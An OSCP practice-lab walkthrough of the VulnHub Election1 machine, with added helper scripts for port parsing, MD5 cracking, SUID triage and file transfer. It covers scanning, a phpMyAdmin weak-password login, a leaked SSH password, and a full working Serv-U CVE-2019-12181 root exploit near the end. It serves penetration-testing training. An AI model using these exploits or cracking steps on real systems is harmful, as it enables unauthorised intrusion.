静静

OSCP Official Practice Lab - Election1 - Writeup

Follow the 泷羽Sec and 泷羽Sec-静安 public accounts, which regularly publish articles on OSCP, penetration testing and related topics to help you keep up with the security field. Reply "OSCP配套工具" to the account to get the tools used in this article.

Connect to the lab VPN through the proxy chain

proxychains sudo openvpn universal.ovpn

Start the machine from the official site, or download the VM image from:

https://www.vulnhub.com/entry/election-1,503/

Information gathering

# Kali attacker address
192.168.45.168
# Target address
192.168.195.211

Port and directory scanning

# Lower the tunnel MTU so large packets do not fragment over the VPN
sudo ip link set dev tun0 mtu 1250
ip link show tun0
# Full TCP port scan, collecting the port numbers into $ports. Note that grep '^[0-9]'
# matches every port line nmap prints, including ports it reports as closed
ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.195.211 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
# Service/version detection on those ports, then the vuln script category
sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.195.211
sudo nmap --script=vuln -p$ports -Pn 192.168.195.211
# Directory brute force and web fingerprinting
gobuster dir -e -u http://192.168.195.211 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 20 -x php,html,txt -b 403,500,404 -z
whatweb http://192.168.195.211/

Scan results (the four high ports in $ports are closed; they were picked up because the grep does not filter on port state):

┌──(kali㉿kali)-[~]
└─$ ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.195.211 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

┌──(kali㉿kali)-[~]
└─$ echo $ports
22,80,15552,17682,34185,35675

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.195.211
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 01:55 -0400
Nmap scan report for 192.168.195.211
Host is up (0.22s latency).

PORT      STATE  SERVICE VERSION
22/tcp    open   ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 20:d1:ed:84:cc:68:a5:a7:86:f0:da:b8:92:3f:d9:67 (RSA)
|   256 78:89:b3:a2:75:12:76:92:2a:f9:8d:27:c1:08:a7:b9 (ECDSA)
|_  256 b8:f4:d6:61:cf:16:90:c5:07:18:99:b0:7c:70:fd:c0 (ED25519)
80/tcp    open   http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
15552/tcp closed unknown
17682/tcp closed unknown
34185/tcp closed unknown
35675/tcp closed unknown
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.14
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.84 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.195.211
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 01:56 -0400
Nmap scan report for 192.168.195.211
Host is up (0.23s latency).

PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
|_http-aspnet-debug: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /robots.txt: Robots file
|   /phpinfo.php: Possible information file
|_  /phpmyadmin/: phpMyAdmin
15552/tcp closed unknown
17682/tcp closed unknown
34185/tcp closed unknown
35675/tcp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 265.92 seconds
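The port list came out as 22,80,15552,17682,34185,35675 although only 22 and 80 are open: the grep '^[0-9]' pipeline keeps every port line nmap prints, closed ones included, so the closed high ports were rescanned with -sC -sV for nothing. The helper below, added here as an example and not part of the original writeup, keeps only ports whose STATE column is exactly open. The nmap output it runs on is a constructed sample shaped like the scan above; the original pipeline is kept alongside for comparison.

```shell
#!/bin/sh
# Added example (not from the original writeup): extract only OPEN ports from
# nmap's port-scan output. The grep '^[0-9]' pipeline used above matches every
# port line, including the ones nmap prints as "closed", so those ports leak
# into $ports and get rescanned with -sC -sV for nothing.

# Constructed nmap output shaped like the scan above.
SAMPLE_NMAP='Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 01:50 -0400
Nmap scan report for 192.168.195.211
Host is up (0.22s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
15552/tcp closed unknown
17682/tcp closed unknown
34185/tcp closed unknown
35675/tcp closed unknown

Nmap done: 1 IP address (1 host up) scanned in 40.00 seconds'

# all_ports OUTPUT: the original pipeline, kept for comparison. Any line
# that starts with a digit is a port line, whatever its state.
all_ports() {
    printf '%s\n' "$1" | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//'
}

# open_ports OUTPUT: keep lines whose STATE column is exactly "open"
# ("open|filtered" from a UDP scan is deliberately excluded) and join the
# port numbers with commas, ready for nmap -p.
open_ports() {
    printf '%s\n' "$1" | awk '$1 ~ /^[0-9]+\/(tcp|udp)$/ && $2 == "open" {
        sub(/\/.*/, "", $1); printf "%s%s", sep, $1; sep = ","
    }'
}

# Live usage (network; not run here):
#   ports=$(open_ports "$(sudo nmap -p- --min-rate=5000 -Pn 192.168.195.211)")
#   sudo nmap -sT -sC -sV -O -Pn -p"$ports" 192.168.195.211
echo "original pipeline: $(all_ports "$SAMPLE_NMAP")"
echo "open ports only  : $(open_ports "$SAMPLE_NMAP")"
```

Filtering on the state column rather than on "line starts with a digit" matters most on hosts where nmap lists many closed or unfiltered ports individually; every one of them would otherwise get a full -sC -sV probe in the follow-up scan.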

The home page is the default Apache page with nothing of interest. robots.txt reveals hidden directories:

admin
wordpress
user
election

Opening the election directory shows a voting page, which says you must log in as admin before voting for a candidate.

The Nmap results show PHP pages, including an exposed phpinfo.php, and indicate that file inclusion is enabled.

Nmap also found the phpMyAdmin management panel.

phpMyAdmin weak-password login

Brute-force weak passwords with:

https://github.com/bmth666/phpMyAdminCrack.git

Copy a wordlist into the tool's directory:

cp  /usr/share/wordlists/seclists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt ./wordlists/password.txt

A weak password gets us in:

root / toor

There is a table that looks like user IDs and passwords. The password column is an unsalted MD5 hash; cracking this hash gives the plaintext:

bb113886b0513a9d882e3caa5cd73314

What we have at this point:

id | no_induk | nama | level | password
1  | 1234     | Love | 1     | bb113886b0513a9d882e3caa5cd73314

Cracked: no_induk 1234, user Love, password Zxc123!@#
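The password column is unsalted MD5, which is why an online lookup returns the plaintext instantly. The same check can be done offline with nothing but md5sum, as in this added example (not from the original writeup). The table rows and the wordlist are constructed to match the layout found in phpMyAdmin; the second row and its hash (MD5 of the word password) are invented for illustration, and md5sum is assumed to be the GNU coreutils version found on Kali and Ubuntu.

```shell
#!/bin/sh
# Added example (not from the original writeup): dictionary attack on the
# unsalted MD5 password column of a user table dumped from phpMyAdmin.
# Needs only GNU md5sum (coreutils), as found on Kali and Ubuntu.

# Constructed table rows in the layout seen in the writeup:
#   id no_induk nama level password
# Row 1 is the row found on the target; row 2 is invented for illustration
# (its hash is MD5 of the word "password").
USERS='1 1234 Love 1 bb113886b0513a9d882e3caa5cd73314
2 5678 Admin 1 5f4dcc3b5aa765d61d8327deb882cf99'

# Constructed short wordlist standing in for a SecLists file.
WORDLIST='root
toor
password
admin
Zxc123!@#
123456'

# md5_hex WORD: hex MD5 of WORD. printf, not echo: "echo word | md5sum"
# hashes "word\n" and never matches a hash stored by a web application.
md5_hex() {
    printf '%s' "$1" | md5sum | cut -d ' ' -f 1
}

# crack_md5 HASH WORDLIST: print the first word whose MD5 equals HASH
# (case-insensitive) and return 0; return 1 if the list is exhausted.
# The braces run in the pipeline's subshell, so exit only leaves that group.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    printf '%s\n' "$2" | {
        while IFS= read -r word; do
            [ "$(md5_hex "$word")" = "$target" ] && { printf '%s\n' "$word"; exit 0; }
        done
        exit 1
    }
}

# crack_table ROWS WORDLIST: one line per user, "no_induk nama plaintext",
# with [uncracked] where the wordlist did not hit.
crack_table() {
    printf '%s\n' "$1" | while read -r rowid no_induk nama level hash; do
        [ -n "$hash" ] || continue
        plain=$(crack_md5 "$hash" "$2") || plain='[uncracked]'
        printf '%s %s %s\n' "$no_induk" "$nama" "$plain"
    done
}

# Live usage with a small list: crack_table "$(cat rows.txt)" "$(cat wordlist.txt)"
crack_table "$USERS" "$WORDLIST"
```

This loop forks md5sum once per candidate, so it is only sensible for short lists like the top-20 file used above; for rockyou-sized lists run hashcat -m 0 (raw MD5) against the hash instead. The point the example makes is the one that decides the attack: no salt, so one lookup per hash and a shared wordlist hit cracks every user with the same password.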

Voting system log leaks a password

Complete the voting URL with admin, http://192.168.195.211/election/admin, and try the back-end login. It asks for an ID first; enter 1234.

Then enter the password Zxc123!@#.

Under System Settings there is an option to view the log. Opening it reveals a leaked password. Since the Nmap scan showed SSH open, this is most likely the SSH password for the user love:

Assigned Password for the user love: P@$$w0rd@123

SSH login

Log in over SSH as love and read local.txt for the flag:

ssh love@192.168.195.211

Privilege escalation to root

Look for privilege escalation vectors, starting with setuid binaries:

find / -type f -perm -u=s 2>/dev/null

An unusual file stands out:

/usr/local/Serv-U/Serv-U
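A stock Ubuntu host returns a few dozen setuid binaries for that find command, almost all of them legitimate (passwd, sudo, mount, ...). What makes /usr/local/Serv-U/Serv-U stand out is its location outside the packaged system paths. This added example (not from the original writeup) filters a SUID list down to such outliers and, on a live Debian/Ubuntu host, reports which files no package claims; the path list it runs on here is constructed.

```shell
#!/bin/sh
# Added example (not from the original writeup): narrow a SUID sweep to the
# binaries worth a second look. Stock setuid binaries live under /bin, /sbin,
# /usr/bin, /usr/sbin and /usr/lib*; hand-installed software such as
# /usr/local/Serv-U/Serv-U does not, and that is exactly what stood out here.

# Constructed stand-in for: find / -type f -perm -u=s 2>/dev/null
SUID_SAMPLE='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/chfn
/bin/mount
/bin/su
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/local/Serv-U/Serv-U
/opt/backup/bkp'

# suid_outliers LIST: print the paths not under a packaged system directory.
# This is a triage order, not a verdict: a trojaned /usr/bin/foo would pass
# the filter, which is what the dpkg check below is for.
suid_outliers() {
    printf '%s\n' "$1" | grep -Ev '^/(usr/)?(s?bin|lib|lib32|lib64|libx32|libexec)/'
}

# suid_report LIST: on a live Debian/Ubuntu host, show perms/owner for every
# path and flag files no package claims (dpkg -S fails for unpackaged files).
# realpath handles merged-/usr systems where /bin/mount is really /usr/bin/mount.
suid_report() {
    printf '%s\n' "$1" | while IFS= read -r path; do
        [ -n "$path" ] || continue
        [ -e "$path" ] || { printf '%s: not present on this host\n' "$path"; continue; }
        ls -la "$path"
        real=$(realpath "$path" 2>/dev/null || printf '%s' "$path")
        if command -v dpkg >/dev/null 2>&1 && ! dpkg -S "$real" >/dev/null 2>&1; then
            printf '%s: NOT owned by any package\n' "$path"
        fi
    done
}

# Live usage: suid_report "$(find / -type f -perm -u=s 2>/dev/null)"
echo "Outliers in the constructed list:"
suid_outliers "$SUID_SAMPLE"
```

Anything the filter keeps deserves the treatment the writeup gives Serv-U next: check the owning directory for version strings and release notes, then search that exact version for known local privilege escalations.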

Running it and inspecting its directory turns up a version file giving the software version, Serv-U File Server (64-bit) - Version 15.1 (15.1.6.25). Searching for vulnerabilities in that version:

Both PoCs point to CVE-2019-12181:

https://github.com/trickest/cve/blob/main/2019/CVE-2019-12181.md

The C PoC needs compiling, so the shell-script version goes first. Serving it over HTTP did not work because the network was too unstable and the transfer kept breaking, so paste the script's contents into the target with cat > exp.sh, finish with Ctrl-D, then add execute permission.

#!/bin/bash
# SUroot - Local root exploit for Serv-U FTP Server versions prior to 15.1.7 (CVE-2019-12181)
# Bash variant of Guy Levin's Serv-U FTP Server exploit:
# - https://github.com/guywhataguy/CVE-2019-12181
# ---
# user@debian-9-6-0-x64-xfce:~/Desktop$ ./SUroot
# [*] Launching Serv-U ...
# sh: 1: : Permission denied
# [+] Success:
# -rwsr-xr-x 1 root root 117208 Jun 28 23:21 /tmp/sh
# [*] Launching root shell: /tmp/sh
# sh-4.4# id
# uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),112(lpadmin),117(scanner)
# ---
# <bcoles@gmail.com>
# https://github.com/bcoles/local-exploits/tree/master/CVE-2019-12181

if ! test -u "/usr/local/Serv-U/Serv-U"; then
  echo '[-] /usr/local/Serv-U/Serv-U is not setuid root'
  exit 1
fi

echo "[*] Launching Serv-U ..."

# Serv-U builds a shell command string that includes its own argv[0] without
# sanitising it. `exec -a` sets argv[0] to a string that closes the quote,
# appends our commands (copy bash, make it setuid root) and reopens the quote.
/bin/bash -c 'exec -a "\";cp /bin/bash /tmp/sh; chown root /tmp/sh; chmod u+sx /tmp/sh;\"" /usr/local/Serv-U/Serv-U -prepareinstallation'

if ! test -u "/tmp/sh"; then
  echo '[-] Failed'
  /bin/rm "/tmp/sh"
  exit 1
fi

echo '[+] Success:'
/bin/ls -la /tmp/sh

echo "[*] Launching root shell: /tmp/sh"
/tmp/sh -p

The C PoC also works.
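Pasting a script through cat > exp.sh over an unstable link works, but a laggy terminal can silently drop or duplicate characters, and nothing in that method tells you whether exp.sh arrived intact. This added example (not from the original writeup) wraps a file as a paste-ready snippet that carries its own SHA-256 and only marks the copy executable if the checksum verifies. The stand-in payload file is constructed; base64, sha256sum and mktemp are assumed to be the GNU versions present on Kali and the Ubuntu target.

```shell
#!/bin/sh
# Added example (not from the original writeup): build a paste-safe,
# self-verifying transfer snippet for when HTTP transfer to the target is
# unreliable. Assumes GNU base64/sha256sum/mktemp (Kali, Ubuntu).

# pack FILE [DEST]: print shell lines to paste into the target session.
# base64 keeps the payload free of tabs, quotes and control characters that
# terminals mangle; the SHA-256 check gates chmod +x, so a corrupted paste
# is deleted instead of executed. No 'exit' is used, since the snippet is
# pasted into a live login shell.
pack() {
    file=$1
    dest=${2:-/tmp/$(basename "$file")}
    sum=$(sha256sum "$file" | cut -d ' ' -f 1)
    printf "base64 -d > '%s' <<'__B64__'\n" "$dest"
    base64 "$file"
    printf '__B64__\n'
    printf "echo '%s  %s' | sha256sum -c - && chmod +x '%s' || { rm -f '%s'; echo 'transfer corrupted, paste again'; }\n" \
        "$sum" "$dest" "$dest" "$dest"
}

# roundtrip FILE: feed the snippet to a local sh and confirm the copy is
# byte-identical and executable. Returns 0 on success; used to prove pack works.
roundtrip() {
    tmp=$(mktemp -d)
    pack "$1" "$tmp/copy" | sh
    if [ "$(sha256sum < "$1")" = "$(sha256sum < "$tmp/copy")" ] && [ -x "$tmp/copy" ]; then
        rc=0
    else
        rc=1
    fi
    rm -rf "$tmp"
    return $rc
}

# Constructed stand-in for exp.sh, with characters a paste tends to mangle.
DEMO=$(mktemp)
printf "#!/bin/sh\n# constructed stand-in for exp.sh\necho \"it's got a\ttab and a 'quote'\"\nexit 0\n" > "$DEMO"

# Usage on the attacker box: pack exp.sh /tmp/exp.sh   (then paste the output)
if roundtrip "$DEMO"; then
    echo "round-trip OK: copy verified and executable"
else
    echo "round-trip FAILED"
fi
```

On the target the pasted block decodes into /tmp/exp.sh, prints "/tmp/exp.sh: OK" from sha256sum and sets the execute bit; a mismatch removes the partial file and asks for another paste, so the check cannot be skipped by accident.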

Summary

Attack path diagram

flowchart TD
    %% Assets
    A[Kali attacker <br> 192.168.45.168]
    B[Target <br> 192.168.195.211]
    C[election directory]
    D[phpMyAdmin panel]
    E[SSH login]
    F[root]

    %% Path
    A-->|scan|B
    B-->|robots.txt disclosure|C
    A-->|Nmap scan|D
    D-->|MD5 from the database cracked to the election admin password|C
    C-->|admin log page leaks the SSH password|E
    E-->|CVE-2019-12181 privilege escalation|F

    %% Line styles: --- solid, -.-> dotted, ==> thick
    %% -->|yes| : edge with a label
    %% Rectangle node [ ], diamond decision node { }, rounded node ( )
    %% Style definitions
    classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
    classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px;
    classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px;
    %% Line style and colours (readable on light and dark themes)
    linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0;

    %% Apply styles
    class A attack;
    class B,D public;
    class C internal;

Attack timeline

gantt
    title Attack timeline
    dateFormat  YYYY-MM-DD HH:mm
    axisFormat  %H:%M

    section Reconnaissance
    Target scanning              :a1, 2026-03-13 13:30, 2026-03-13 14:09
    Vulnerability identification :a2, after a1, 2026-03-13 14:51

    section Attack
    Initial access               :b1, after a2, 3m
    Privilege escalation         :crit,b2, after b1, 2026-03-13 15:20
